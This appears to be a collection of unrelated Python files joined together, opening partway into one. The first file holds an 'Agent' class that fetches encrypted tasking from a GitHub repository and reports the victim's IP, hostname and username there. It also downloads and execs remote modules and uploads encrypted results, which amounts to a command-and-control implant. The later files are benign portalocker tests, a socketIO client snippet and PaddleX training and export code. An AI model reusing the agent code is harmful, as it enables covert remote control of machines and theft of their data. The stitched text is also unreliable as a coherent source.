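#   gh.update('results/output.txt', 'hello again', sha=meta.get('sha'))
#   gh.delete('results/output.txt', sha=meta.get('sha'))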
def Threaded(func):
def wrapper(*_args, **kwargs):
t = threading.Thread(target=func, args=_args)
t.daemon = True
t.start()
return
return wrapper
class Agent(object):
# python -c "import os;print(os.urandom(8).hex())"
uid = '602841a3ee0ecb12'
gid = 'aecdf0678459dcd8'
def __init__(self, owner, repo, branch='master',
conf_path='config', debug=False):
self.owner = owner
self.repo = repo
self.branch = branch
self._conf_path = conf_path
self.debug = debug
# self.idle = True
self.silent = False
# self.last_active = time.time()
self.failed_connections = 0
self.conf = None
self.conf_sha = None
self.gh_conf = None
self.gh_result = None
self.cmdpub = '' # encode with hex
self.prikey = ''
self.aes_key = ''
self.tasks = set()
self.modules = {}
self.run_modules = Queue.Queue()
self.task_queue = Queue.Queue()
self.modules_ok = []
self.info = self.get_info()
self.init()
self.run_task()
def init(self):
self.conf = self.get_conf_try(self.conf_url)
if not self.conf:
return
self.parse_conf()
self.gh = GitHubAPI(self.gh_result[0], None,
self.gh_result[1], self.gh_result[2])
self.heartbeat()
def parse_conf(self):
try:
self.gh_conf = self.conf['BaseAcc'].split('$$')
self.gh_result = self.conf['RetAcc'].split('$$')
self.ret_path = self.conf['RetPath']
self.hbt = self.conf['HBTime']
self._conf_path = self.conf['ConfPath']
self.aes_key = self.conf['AesKey']
self.cmdpub = self.conf['SrvPubKey']
self.prikey = self.conf['ToyPriKey']
self.modules = self.conf['Modules']
self.owner = self.gh_conf[0]
self.token = self.gh_conf[1]
self.repo = self.gh_conf[2]
for task in self.conf['Tasks']:
self.tasks.add(task)
self.conf = None
except Exception as e:
if self.debug:
print(e)
@property
def base_url(self):
_base_url = 'https://raw.githubusercontent.com/'
_base_url += '/'.join((self.owner, self.repo, self.branch, ''))
return _base_url
@property
def conf_path(self):
name = '-'.join((self.gid, self.uid)) + '.conf'
conf_path = '/'.join((self._conf_path, name))
return conf_path
@property
def conf_url(self):
return self.base_url + self.conf_path
# @property
# def report_base(self):
# name = '.'.join((self.gid, self.uid))
# _report_base = '/'.join((self.ret_path, name))
# return _report_base
# def task_conf_url(self, taskid):
# path = self.conf['ConfPath'] + 'task/'
# path += taskid + '.conf'
# url = 'https://raw.githubusercontent.com'
# url += '/%s/%s/%s/%s' % (self.owner, self.repo,
# self.branch, path)
# return url
@Threaded
def heartbeat(self):
path = '/'.join((self.ret_path, 'hbt', '-'.join((self.gid, self.uid)) + '.data'))
while True:
try:
# info = self.get_info()
self.info['timestamp'] = time.time()
# self.report(str(time.time()), path, plain=True)
self.report(json.dumps(self.info), path, plain=True)
time.sleep(self.hbt)
if self.is_conf_update():
# self.init(self.conf_url)
self.parse_conf()
self.moudle_check()
except Exception as e:
if self.debug:
print(e)
def get_info(self):
ip = self.get_host_ip()
plat = platform.system() + " " + platform.release()
hostname = socket.gethostname()
username = getpass.getuser()
timestamp = time.time()
return dict(ip=ip, platform=plat, hostname=hostname,
username=username, timestamp=timestamp)
@staticmethod
def get_host_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 53))
ip = s.getsockname()[0]
finally:
s.close()
return ip
def get_conf_try(self, url, trynum=3):
num = 0
conf = None
while num < trynum:
conf = self.get_content(url)
if conf:
break
num += 1
return conf
# def get_task(self, taskid):
# conf = self.get_content(self.task_conf_url(taskid))
# if not conf:
# return
# # Todo...
# def parse_task_conf(self, conf):
# pass
def is_conf_update(self):
# check github file sha
try:
c = self.gh.get(self.conf_path)
if c['sha'] == self.conf_sha:
return False
self.conf_sha = c['sha']
self.conf = self.decrypt(c['content'].decode('base64'))
return True
except Exception as e:
if self.debug:
print(e)
return False
def get_content(self, url):
try:
conf = urlopen(url).read()
if conf:
conf = self.decrypt(conf.strip())
return json.loads(conf)
else:
return None
except Exception as e:
if self.debug:
print(e)
return None
def report(self, msg, path, plain=False):
content = msg if plain else self.encrypt(msg)
data = self.gh.get(path)
if not data:
s = self.gh.put(path, content)
else:
s = self.gh.update(path, content, data['sha'])
if self.debug:
print(s)
def moudle_check(self):
for task in self.tasks:
requires = task.get('requires', None)
if requires:
for r in requires:
pkg = r.get('package', '')
mod = r.get('module', None)
self.load(r['name'], r['url'], pkg, mod)
self.loadGH(task['mod'])
self.task_run_check(task)
for mod in self.modules:
self.loadGH(mod)
self.run_modules.put(dict(name=mod.__name__, mod=mod))
# @Threaded
def task_run_check(self, task):
now = time.time()
if task['start'] > task['end']:
self.tasks.remove(task)
if now >= task['start'] and now <= task['end']:
task['build'] = now
# task['nextrun'] = 0
if task['step'] > 0:
task['start'] += task['step']
# task['nextrun'] = nextrun
self.run_modules.put(task.copy())
return task
# elif now < task['start']:
# return task
def random_key(self, num=16):
return ''.join(random.sample(string.printable, num))
def encrypt(self, content, raw=False, aes=True):
if raw:
return content
rkey = RSA.importKey(self.cmdpub.decode('hex'))
if not aes:
return self.rsa_encrypt(content, rkey).encode('base64')
akey = self.random_key()
ec = self.aes_encrypt(content, akey)
ek = self.rsa_encrypt(akey, rkey)
return ';;'.join((ec, ek)).encode('base64')
def decrypt(self, content):
content = content.decode('base64') if content else ''
if ';;[]' in content:
return content[:-4]
rk = RSA.importKey(self.prikey)
if ';;' in content:
# parse encrypt content and encrypt key
c, e = content.split(';;')
if not e:
# no encrypt key
return self.aes_decrypt(c, self.aes_key)
else:
# have encrypt key, decrypt the key
ak = self.rsa_decrypt(e, rk)
# decrypt the content
return self.aes_decrypt(c, ak)
else:
# no aes encrypt
return self.rsa_decrypt(content, rk)
def rsa_encrypt(self, content, key=None):
if not key:
return content
cipher = PKCS1_OAEP.new(key)
return cipher.encrypt(content)
def rsa_decrypt(self, content, key=None):
if not key:
return content
if not key.has_private():
print('[!] Not a valid PrivateKey!')
return None
cipher = PKCS1_OAEP.new(key)
return cipher.decrypt(content)
def aes_encrypt(self, content, key):
iv = Random.new().read(AES.block_size)
cipher = AES.new(key, AES.MODE_CFB, iv)
msg = iv + cipher.encrypt(content.decode('utf-8'))
return msg
def aes_decrypt(self, content, key):
iv = content[:AES.block_size]
msg = content[AES.block_size:]
cipher = AES.new(key, AES.MODE_CFB, iv)
msg = cipher.decrypt(msg)
return msg.encode('utf-8')
@staticmethod
def load(repo, url, package='', module=None):
if not package and not module:
try:
logging.info('Try to import module')
add_remote_repo([repo], url)
exec "import %s" % repo
except Exception:
logging.error('Exception with import %s' % repo)
pass
else:
pk = '.'.join((repo, package)) if package.split(
'.')[0] != repo else package
md = ', '.join(module) if isinstance(
module, (list, tuple)) else module
pk = pk[:-1] if pk.endswith('.') else pk
with remote_repo([repo], url):
exec "from %s import %s" % (pk, md)
def loadGH(self, module, package='moudle', user=None, repo=None):
user = user or self.owner
repo = repo or self.repo
pk = '.'.join((repo, package)) if package.split(
'.')[0] != repo else package
md = ','.join(module) if isinstance(
module, (list, tuple)) else module
pk = pk[:-1] if pk.endswith('.') else pk
with github_repo(user, repo):
exec "from %s import %s" % (pk, md)
def unload(self, module, url=None):
logging.info('Try to unload module')
url = url or self.base_url
remove_remote_repo(url)
if module in sys.modules:
del module
# def install(self):
# for url, pkgs in self.base_modules.items():
# if not isinstance(pkgs, (list, tuple)):
# pkgs = [pkgs]
# for p in pkgs:
# self.load(p, url)
# for pkg in self.run_modules:
# self.load_module(pkg['module'])
# self.init = False
# def parse_require(self, pkg):
# requires = pkg.get('requires', None)
# if requires:
# for k, v in requires.items():
# self.load(v, k)
# def check(self, url=None):
# url = url or self.conf_url
# conf = self.get_config(url)
# self.parse_conf(conf)
# for task in self.run_modules:
# self.load_module(task['module'])
# tasks = self.load_task(self.task_url) if self.task_url else []
# self.run_modules += tasks
# def load_module(self, mod, pkg='toy.modules'):
# try:
# logging.info('Import %s from %s' % (mod, pkg))
# self.load(self.repo, )
# exec "from %s import %s" % (pkg, mod)
# except Exception:
# logging.error("Import %s error" % '.'.join((pkg, mod)))
# def load_task(self, task_url):
# tasks = self.get(task_url)
# logging.info('[+] Get task config: %s' % tasks)
# if tasks:
# tasks = json.loads(tasks)
# logging.info('[*] Get task %s from %s' % (tasks['name'], task_url))
# requires = tasks.get('require', {})
# for u, p in requires.items():
# for k in p:
# logging.info('[*] Load required packages: %s from %s' % (k, u))
# self.load([k], u)
# self.load(tasks['name'], tasks['url'])
# for task in tasks['task']:
# self.load_module(task['module'], tasks['name'] + '.modules')
# else:
# tasks = []
# return tasks
def worker(self, m, args=None, kwargs=None):
args = args or []
kwargs = kwargs or {}
task_name = kwargs.pop('task_name') or m.__name__
build = int(kwargs.pop('build'))
start = int(kwargs.pop('start'))
task_id = kwargs.pop('taskid')
path = '/'.join((self.ret_path, 'res', '.'.join((self.uid, task_id, 'data'))))
self.task_queue.put(1)
if self.debug:
print(sys.modules[m])
result = sys.modules[m].run(*args, **kwargs) or 'Err'
self.task_queue.get()
ret = dict(BuildTime=str(build), StartTime=str(start), Result=result)
self.report(json.dumps(ret), path)
return
@Threaded
def run_task(self):
# self.install()
while True:
if not self.run_modules.empty:
task = self.run_modules.get()
logging.info("run task %s" % task['mod'])
mod = 'toy.module.%s' % task['mod']
arg = task.get('args', ())
kws = task.get('kws', {})
kws['task_name'] = task.get('name')
kws['build'] = task.get('build')
kws['start'] = time.time()
kws['taskid'] = task.get('taskid')
try:
t = threading.Thread(
target=self.worker, args=(mod, arg, kws))
t.daemon = True
t.start()
time.sleep(random.randint(1, 10))
except Exception as e:
if self.debug:
print(e)
logging.error('run exception')
# time.sleep(self.cf)
time.sleep(random.randint(10, 50))
if __name__ == '__main__':
Agent()
|
contribs.py
|
import os
import threading
import time
from ._compat import unittest
from ._adapt import IS_GAE
from pydal._compat import to_bytes
from pydal.contrib.portalocker import lock, unlock, read_locked, write_locked
from pydal.contrib.portalocker import LockedFile, LOCK_EX
def tearDownModule():
if os.path.isfile('test.txt'):
os.unlink('test.txt')
class testPortalocker(unittest.TestCase):
def test_LockedFile(self):
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes('test ok'))
f.close()
f = LockedFile('test.txt', mode='rb')
self.assertEqual(f.read(), to_bytes('test ok'))
f.close()
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_openmultiple(self):
t0 = time.time()
def worker1():
start = time.time()
f1 = LockedFile('test.txt', mode='ab')
time.sleep(2)
f1.write(to_bytes("%s\t%s\n" % (start, time.time())))
f1.close()
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes(''))
f.close()
th = []
for x in range(10):
t1 = threading.Thread(target=worker1)
th.append(t1)
t1.start()
for t in th:
t.join()
with open('test.txt') as g:
content = g.read()
results = [line.strip().split('\t') for line in content.split('\n') if line]
# all started at more or less the same time
starts = [1 for line in results if float(line[0])-t0<1]
ends = [line[1] for line in results]
        self.assertEqual(sum(starts), len(results))
# end - start is at least 2
for line in results:
self.assertTrue(float(line[1]) - float(line[0]) >= 2)
# ends are not the same
        self.assertTrue(len(ends) == len(set(ends)))
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_lock_unlock(self):
def worker1(fh):
time.sleep(2)
unlock(fh)
def worker2(fh):
time.sleep(2)
fh.close()
f = open('test.txt', mode='wb')
lock(f, LOCK_EX)
f.write(to_bytes('test ok'))
t1 = threading.Thread(target=worker1, args=(f, ))
t1.start()
start = int(time.time())
content = read_locked('test.txt')
end = int(time.time())
t1.join()
f.close()
# it took at least 2 seconds to read
# although nothing is there until .close()
self.assertTrue(end - start >= 2)
self.assertEqual(content, to_bytes(''))
content = read_locked('test.txt')
self.assertEqual(content, to_bytes('test ok'))
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes('test ok'))
t1 = threading.Thread(target=worker2, args=(f, ))
t1.start()
start = int(time.time())
content = read_locked('test.txt')
end = int(time.time())
t1.join()
# it took at least 2 seconds to read
# content is there because we called close()
self.assertTrue(end - start >= 2)
self.assertEqual(content, to_bytes('test ok'))
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_read_locked(self):
def worker(fh):
time.sleep(2)
fh.close()
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes('test ok'))
t1 = threading.Thread(target=worker, args=(f, ))
t1.start()
start = int(time.time())
content = read_locked('test.txt')
end = int(time.time())
t1.join()
# it took at least 2 seconds to read
self.assertTrue(end - start >= 2)
self.assertEqual(content, to_bytes('test ok'))
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_write_locked(self):
def worker(fh):
time.sleep(2)
fh.close()
f = open('test.txt', mode='wb')
lock(f, LOCK_EX)
t1 = threading.Thread(target=worker, args=(f, ))
t1.start()
start = int(time.time())
write_locked('test.txt', to_bytes('test ok'))
end = int(time.time())
t1.join()
with open('test.txt') as g:
content = g.read()
# it took at least 2 seconds to read
self.assertTrue(end - start >= 2)
self.assertEqual(content, 'test ok')
def test_exception(self):
self.assertRaises(RuntimeError, LockedFile, *['test.txt', 'x'])
def test_readline(self):
f = LockedFile('test.txt', 'wb')
f.write(to_bytes('abc\n'))
f.write(to_bytes('123\n'))
f.close()
f = LockedFile('test.txt', 'rb')
rl = f.readline()
self.assertTrue(to_bytes('abc') in rl)
rl = f.readline()
self.assertTrue(to_bytes('123') in rl)
f.close()
f = LockedFile('test.txt', 'rb')
rls = f.readlines()
f.close()
self.assertEqual(len(rls), 2)
|
multithreading-client.py
|
from socketIO_client_nexus import SocketIO, BaseNamespace
import json
import time
from threading import Thread
# Shared state used by the socket callback. These names were referenced but
# never defined in the original file; minimal placeholders are assumed here.
emotion_batch = []
dict_emotion = {}  # assumed mapping from server emotion labels to local values
def receive_events_thread():
    socketIO.wait()
def on_response(*args):
    global emotion_batch
    loads = json.loads(args[0])
    try:
        for i in loads['database']:
            emotion_batch.append(dict_emotion[i['emotion']])
    except Exception:
        pass
socketIO = SocketIO('ip', port)
namespace = socketIO.define(BaseNamespace, '/directory')
namespace.on('update', on_response)
receive_events_thread = Thread(target=receive_events_thread)
receive_events_thread.daemon = True
receive_events_thread.start()
while True:
    # do something while listening to the socket
    time.sleep(1)
|
operate.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path as osp
import os
import numpy as np
from PIL import Image
import sys
import cv2
import psutil
import shutil
import pickle
import base64
import multiprocessing as mp
from ..utils import (pkill, set_folder_status, get_folder_status, TaskStatus,
PredictStatus, PruneStatus)
from .evaluate.draw_pred_result import visualize_classified_result, visualize_detected_result, visualize_segmented_result
from .visualize import plot_det_label, plot_insseg_label, get_color_map_list
def _call_paddle_prune(best_model_path, prune_analysis_path, params):
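    """Run the pruning sensitivity analysis for the best saved model.
    Logs are redirected to out.log/err.log under prune_analysis_path, the
    sensitivity data is written to sensitivities.data, and the folder status
    is set to XSPRUNEDONE when the analysis finishes.
    """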
mode = 'w'
sys.stdout = open(
osp.join(prune_analysis_path, 'out.log'), mode, encoding='utf-8')
sys.stderr = open(
osp.join(prune_analysis_path, 'err.log'), mode, encoding='utf-8')
sensitivities_path = osp.join(prune_analysis_path, "sensitivities.data")
task_type = params['task_type']
dataset_path = params['dataset_path']
os.environ['CUDA_VISIBLE_DEVICES'] = params['train'].cuda_visible_devices
if task_type == "classification":
from .prune.classification import prune
elif task_type in ["detection", "instance_segmentation"]:
from .prune.detection import prune
elif task_type == "segmentation":
from .prune.segmentation import prune
batch_size = params['train'].batch_size
prune(best_model_path, dataset_path, sensitivities_path, batch_size)
import paddlex as pdx
from paddlex.cv.models.slim.visualize import visualize
model = pdx.load_model(best_model_path)
visualize(model, sensitivities_path, prune_analysis_path)
set_folder_status(prune_analysis_path, PruneStatus.XSPRUNEDONE)
def _call_paddlex_train(task_path, params):
    '''
    Args:
        params(dict): fields include 'pretrain_weights_download_save_dir' (where
            downloaded pretrained weights are saved), 'task_type' (type of task),
            'dataset_path' (dataset path) and 'train' (training parameters).
    '''
mode = 'w'
if params['train'].resume_checkpoint is not None:
mode = 'a'
sys.stdout = open(osp.join(task_path, 'out.log'), mode, encoding='utf-8')
sys.stderr = open(osp.join(task_path, 'err.log'), mode, encoding='utf-8')
sys.stdout.write("This log file path is {}\n".format(
osp.join(task_path, 'out.log')))
sys.stdout.write("注意:标志为WARNING/INFO类的仅为警告或提示类信息,非错误信息\n")
sys.stderr.write("This log file path is {}\n".format(
osp.join(task_path, 'err.log')))
sys.stderr.write("注意:标志为WARNING/INFO类的仅为警告或提示类信息,非错误信息\n")
os.environ['CUDA_VISIBLE_DEVICES'] = params['train'].cuda_visible_devices
import paddlex as pdx
pdx.gui_mode = True
pdx.log_level = 3
pdx.pretrain_dir = params['pretrain_weights_download_save_dir']
task_type = params['task_type']
dataset_path = params['dataset_path']
if task_type == "classification":
from .train.classification import train
elif task_type in ["detection", "instance_segmentation"]:
from .train.detection import train
elif task_type == "segmentation":
from .train.segmentation import train
train(task_path, dataset_path, params['train'])
set_folder_status(task_path, TaskStatus.XTRAINDONE)
def _call_paddlex_evaluate_model(task_path,
model_path,
task_type,
epoch,
topk=5,
score_thresh=0.3,
overlap_thresh=0.5):
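    """Evaluate a saved model and dump the report to 'eval_res.pkl' under task_path.
    topk is used for classification; score_thresh and overlap_thresh are used
    for detection and instance segmentation.
    """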
evaluate_status_path = osp.join(task_path, './logs/evaluate')
sys.stdout = open(
osp.join(evaluate_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(evaluate_status_path, 'err.log'), 'w', encoding='utf-8')
if task_type == "classification":
from .evaluate.classification import Evaluator
evaluator = Evaluator(model_path, topk=topk)
elif task_type == "detection":
from .evaluate.detection import DetEvaluator
evaluator = DetEvaluator(
model_path,
score_threshold=score_thresh,
overlap_thresh=overlap_thresh)
elif task_type == "instance_segmentation":
from .evaluate.detection import InsSegEvaluator
evaluator = InsSegEvaluator(
model_path,
score_threshold=score_thresh,
overlap_thresh=overlap_thresh)
elif task_type == "segmentation":
from .evaluate.segmentation import Evaluator
evaluator = Evaluator(model_path)
report = evaluator.generate_report()
report['epoch'] = epoch
pickle.dump(report, open(osp.join(task_path, "eval_res.pkl"), "wb"))
set_folder_status(evaluate_status_path, TaskStatus.XEVALUATED)
set_folder_status(task_path, TaskStatus.XEVALUATED)
def _call_paddlex_predict(task_path,
predict_status_path,
params,
img_list,
img_data,
save_dir,
score_thresh,
epoch=None):
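    """Predict images with the model saved under task_path and write the
    visualized results to save_dir. Either a list of image paths (img_list)
    or a single base64-encoded image (img_data) is processed; the number of
    images to process is recorded in the 'total_num' file under
    predict_status_path.
    """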
total_num = open(
osp.join(predict_status_path, 'total_num'), 'w', encoding='utf-8')
def write_file_num(total_file_num):
total_num.write(str(total_file_num))
total_num.close()
sys.stdout = open(
osp.join(predict_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(predict_status_path, 'err.log'), 'w', encoding='utf-8')
import paddlex as pdx
pdx.log_level = 3
task_type = params['task_type']
dataset_path = params['dataset_path']
if epoch is None:
model_path = osp.join(task_path, 'output', 'best_model')
else:
model_path = osp.join(task_path, 'output', 'epoch_{}'.format(epoch))
model = pdx.load_model(model_path)
file_list = dict()
predicted_num = 0
if task_type == "classification":
if img_data is None:
if len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test_list.txt")):
with open(osp.join(dataset_path, "test_list.txt")) as f:
for line in f:
items = line.strip().split()
file_list[osp.join(dataset_path, items[0])] = items[1]
else:
for image in img_list:
file_list[image] = None
total_file_num = len(file_list)
write_file_num(total_file_num)
for image, label_id in file_list.items():
pred_result = {}
if label_id is not None:
pred_result["gt_label"] = model.labels[int(label_id)]
results = model.predict(img_file=image)
pred_result["label"] = []
pred_result["score"] = []
pred_result["topk"] = len(results)
for res in results:
pred_result["label"].append(res['category'])
pred_result["score"].append(res['score'])
visualize_classified_result(save_dir, image, pred_result)
predicted_num += 1
else:
img_data = base64.b64decode(img_data)
img_array = np.frombuffer(img_data, np.uint8)
            img = cv2.imdecode(img_array, cv2.IMREAD_ANYCOLOR)
results = model.predict(img)
pred_result = {}
pred_result["label"] = []
pred_result["score"] = []
pred_result["topk"] = len(results)
for res in results:
pred_result["label"].append(res['category'])
pred_result["score"].append(res['score'])
visualize_classified_result(save_dir, img, pred_result)
elif task_type in ["detection", "instance_segmentation"]:
if img_data is None:
if task_type == "detection" and osp.exists(
osp.join(dataset_path, "test_list.txt")):
if len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test_list.txt")):
with open(osp.join(dataset_path, "test_list.txt")) as f:
for line in f:
items = line.strip().split()
file_list[osp.join(dataset_path, items[0])] = \
osp.join(dataset_path, items[1])
else:
for image in img_list:
file_list[image] = None
total_file_num = len(file_list)
write_file_num(total_file_num)
for image, anno in file_list.items():
results = model.predict(img_file=image)
image_pred = pdx.det.visualize(
image, results, threshold=score_thresh, save_dir=None)
save_name = osp.join(save_dir, osp.split(image)[-1])
image_gt = None
if anno is not None:
image_gt = plot_det_label(image, anno, model.labels)
visualize_detected_result(save_name, image_gt, image_pred)
predicted_num += 1
elif len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test.json")):
from pycocotools.coco import COCO
anno_path = osp.join(dataset_path, "test.json")
coco = COCO(anno_path)
img_ids = coco.getImgIds()
total_file_num = len(img_ids)
write_file_num(total_file_num)
for img_id in img_ids:
img_anno = coco.loadImgs(img_id)[0]
file_name = img_anno['file_name']
name = (osp.split(file_name)[-1]).split(".")[0]
anno = osp.join(dataset_path, "Annotations", name + ".npy")
img_file = osp.join(dataset_path, "JPEGImages", file_name)
results = model.predict(img_file=img_file)
image_pred = pdx.det.visualize(
img_file,
results,
threshold=score_thresh,
save_dir=None)
save_name = osp.join(save_dir, osp.split(img_file)[-1])
if task_type == "detection":
image_gt = plot_det_label(img_file, anno, model.labels)
else:
image_gt = plot_insseg_label(img_file, anno,
model.labels)
visualize_detected_result(save_name, image_gt, image_pred)
predicted_num += 1
else:
total_file_num = len(img_list)
write_file_num(total_file_num)
for image in img_list:
results = model.predict(img_file=image)
image_pred = pdx.det.visualize(
image, results, threshold=score_thresh, save_dir=None)
save_name = osp.join(save_dir, osp.split(image)[-1])
visualize_detected_result(save_name, None, image_pred)
predicted_num += 1
else:
img_data = base64.b64decode(img_data)
img_array = np.frombuffer(img_data, np.uint8)
            img = cv2.imdecode(img_array, cv2.IMREAD_ANYCOLOR)
results = model.predict(img)
image_pred = pdx.det.visualize(
img, results, threshold=score_thresh, save_dir=None)
image_gt = None
save_name = osp.join(save_dir, 'predict_result.png')
visualize_detected_result(save_name, image_gt, image_pred)
elif task_type == "segmentation":
if img_data is None:
if len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test_list.txt")):
with open(osp.join(dataset_path, "test_list.txt")) as f:
for line in f:
items = line.strip().split()
file_list[osp.join(dataset_path, items[0])] = \
osp.join(dataset_path, items[1])
else:
for image in img_list:
file_list[image] = None
total_file_num = len(file_list)
write_file_num(total_file_num)
color_map = get_color_map_list(256)
legend = {}
for i in range(len(model.labels)):
legend[model.labels[i]] = color_map[i]
for image, anno in file_list.items():
results = model.predict(img_file=image)
image_pred = pdx.seg.visualize(image, results, save_dir=None)
pse_pred = pdx.seg.visualize(
image, results, weight=0, save_dir=None)
image_ground = None
pse_label = None
if anno is not None:
label = np.asarray(Image.open(anno)).astype('uint8')
image_ground = pdx.seg.visualize(
image, {'label_map': label}, save_dir=None)
pse_label = pdx.seg.visualize(
image, {'label_map': label}, weight=0, save_dir=None)
save_name = osp.join(save_dir, osp.split(image)[-1])
visualize_segmented_result(save_name, image_ground, pse_label,
image_pred, pse_pred, legend)
predicted_num += 1
else:
img_data = base64.b64decode(img_data)
img_array = np.frombuffer(img_data, np.uint8)
            img = cv2.imdecode(img_array, cv2.IMREAD_ANYCOLOR)
color_map = get_color_map_list(256)
legend = {}
for i in range(len(model.labels)):
legend[model.labels[i]] = color_map[i]
results = model.predict(img)
            image_pred = pdx.seg.visualize(img, results, save_dir=None)
            pse_pred = pdx.seg.visualize(
                img, results, weight=0, save_dir=None)
image_ground = None
pse_label = None
save_name = osp.join(save_dir, 'predict_result.png')
visualize_segmented_result(save_name, image_ground, pse_label,
image_pred, pse_pred, legend)
set_folder_status(predict_status_path, PredictStatus.XPREDONE)
def _call_paddlex_export_infer(task_path, save_dir, export_status_path, epoch):
    # Export the model without using the GPU
sys.stdout = open(
osp.join(export_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(export_status_path, 'err.log'), 'w', encoding='utf-8')
import os
os.environ['CUDA_VISIBLE_DEVICES'] = ''
import paddlex as pdx
if epoch is not None:
model_dir = "epoch_{}".format(epoch)
model_path = osp.join(task_path, 'output', model_dir)
else:
model_path = osp.join(task_path, 'output', 'best_model')
model = pdx.load_model(model_path)
model.export_inference_model(save_dir)
set_folder_status(export_status_path, TaskStatus.XEXPORTED)
set_folder_status(task_path, TaskStatus.XEXPORTED)
def _call_paddlex_export_quant(task_path, params, save_dir, export_status_path,
epoch):
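    """Export a quantized model to save_dir and write the evaluation metrics
    measured before and after quantization to 'quant_result.json' under
    export_status_path.
    """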
sys.stdout = open(
osp.join(export_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(export_status_path, 'err.log'), 'w', encoding='utf-8')
dataset_path = params['dataset_path']
task_type = params['task_type']
os.environ['CUDA_VISIBLE_DEVICES'] = params['train'].cuda_visible_devices
import paddlex as pdx
if epoch is not None:
model_dir = "epoch_{}".format(epoch)
model_path = osp.join(task_path, 'output', model_dir)
else:
model_path = osp.join(task_path, 'output', 'best_model')
model = pdx.load_model(model_path)
if task_type == "classification":
train_file_list = osp.join(dataset_path, 'train_list.txt')
val_file_list = osp.join(dataset_path, 'val_list.txt')
label_list = osp.join(dataset_path, 'labels.txt')
quant_dataset = pdx.datasets.ImageNet(
data_dir=dataset_path,
file_list=train_file_list,
label_list=label_list,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.ImageNet(
data_dir=dataset_path,
file_list=val_file_list,
label_list=label_list,
transforms=model.eval_transforms)
elif task_type == "detection":
train_file_list = osp.join(dataset_path, 'train_list.txt')
val_file_list = osp.join(dataset_path, 'val_list.txt')
label_list = osp.join(dataset_path, 'labels.txt')
quant_dataset = pdx.datasets.VOCDetection(
data_dir=dataset_path,
file_list=train_file_list,
label_list=label_list,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.VOCDetection(
data_dir=dataset_path,
file_list=val_file_list,
label_list=label_list,
transforms=model.eval_transforms)
elif task_type == "instance_segmentation":
train_json = osp.join(dataset_path, 'train.json')
val_json = osp.join(dataset_path, 'val.json')
quant_dataset = pdx.datasets.CocoDetection(
data_dir=osp.join(dataset_path, 'JPEGImages'),
ann_file=train_json,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.CocoDetection(
data_dir=osp.join(dataset_path, 'JPEGImages'),
ann_file=val_json,
transforms=model.eval_transforms)
elif task_type == "segmentation":
train_file_list = osp.join(dataset_path, 'train_list.txt')
val_file_list = osp.join(dataset_path, 'val_list.txt')
label_list = osp.join(dataset_path, 'labels.txt')
quant_dataset = pdx.datasets.SegDataset(
data_dir=dataset_path,
file_list=train_file_list,
label_list=label_list,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.SegDataset(
data_dir=dataset_path,
file_list=val_file_list,
label_list=label_list,
transforms=model.eval_transforms)
metric_before = model.evaluate(eval_dataset)
pdx.log_level = 3
pdx.slim.export_quant_model(
model, quant_dataset, batch_size=1, save_dir=save_dir, cache_dir=None)
model_quant = pdx.load_model(save_dir)
metric_after = model_quant.evaluate(eval_dataset)
metrics = {}
if task_type == "segmentation":
metrics['before'] = {'miou': metric_before['miou']}
metrics['after'] = {'miou': metric_after['miou']}
else:
metrics['before'] = metric_before
metrics['after'] = metric_after
import json
with open(
osp.join(export_status_path, 'quant_result.json'),
'w',
encoding='utf-8') as f:
json.dump(metrics, f)
set_folder_status(export_status_path, TaskStatus.XEXPORTED)
set_folder_status(task_path, TaskStatus.XEXPORTED)
def _call_paddlelite_export_lite(model_path, save_dir=None, place="arm"):
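    """Convert an exported inference model into a Paddle-Lite model with the
    lite Opt tool; by default the optimized model is written to the
    'lite_model' folder under model_path.
    """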
import paddlelite.lite as lite
opt = lite.Opt()
model_file = os.path.join(model_path, '__model__')
params_file = os.path.join(model_path, '__params__')
if save_dir is None:
save_dir = osp.join(model_path, "lite_model")
if not osp.exists(save_dir):
os.makedirs(save_dir)
path = osp.join(save_dir, "model")
opt.run_optimize("", model_file, params_file, "naive_buffer", place, path)
def safe_clean_folder(folder):
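    """Recreate `folder` as an empty directory; if the folder cannot be removed
    as a whole, fall back to deleting its files one by one.
    """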
if osp.exists(folder):
try:
shutil.rmtree(folder)
os.makedirs(folder)
except Exception as e:
pass
if osp.exists(folder):
for root, dirs, files in os.walk(folder):
for name in files:
try:
os.remove(os.path.join(root, name))
except Exception as e:
pass
else:
os.makedirs(folder)
else:
os.makedirs(folder)
if not osp.exists(folder):
os.makedirs(folder)
def get_task_max_saved_epochs(task_path):
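    """Return the largest epoch number that has a complete checkpoint (marked
    by a '.success' file) under task_path/output, or -1 if there is none.
    """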
saved_epoch_num = -1
output_path = osp.join(task_path, "output")
if osp.exists(output_path):
for f in os.listdir(output_path):
if f.startswith("epoch_"):
if not osp.exists(osp.join(output_path, f, '.success')):
continue
curr_epoch_num = int(f[6:])
if curr_epoch_num > saved_epoch_num:
saved_epoch_num = curr_epoch_num
return saved_epoch_num
def get_task_status(task_path):
